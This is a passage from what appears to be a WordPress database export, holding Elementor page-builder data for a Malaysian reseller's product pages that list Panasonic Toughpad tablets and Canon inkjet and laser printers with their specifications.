perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":47},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3747,2692,'_elementor_version','0.4'),(3750,2696,'_edit_lock','1545379398:1'),(3751,2696,'_edit_last','1'),(3752,2696,'_wp_page_template','template-fullwidth.php'),(3753,2696,'_hide_page_title',''),(3754,2696,'_hide_header',''),(3755,2696,'_hide_footer',''),(3756,2696,'_hide_breadcrumb',''),(3757,2696,'_cover',''),(3758,2696,'_show_excerpt',''),(3759,2696,'_wc_apply_product',''),(3760,2696,'_yoast_wpseo_content_score','90'),(3761,2703,'_edit_lock','1545380229:1'),(3762,2703,'_edit_last','1'),(3763,2703,'_wp_page_template','template-fullwidth.php'),(3764,2703,'_hide_page_title',''),(3765,2703,'_hide_header',''),(3766,2703,'_hide_footer',''),(3767,2703,'_hide_breadcrumb',''),(3768,2703,'_cover',''),(3769,2703,'_show_excerpt',''),(3770,2703,'_wc_apply_product',''),(3771,2703,'_yoast_wpseo_content_score','60'),(3772,1449,'_elementor_edit_mode','builder'),(3773,1449,'_elementor_template_type','post'),(3804,2718,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Printer :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One with Fax for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan\\u00a0 Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3779,1449,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input 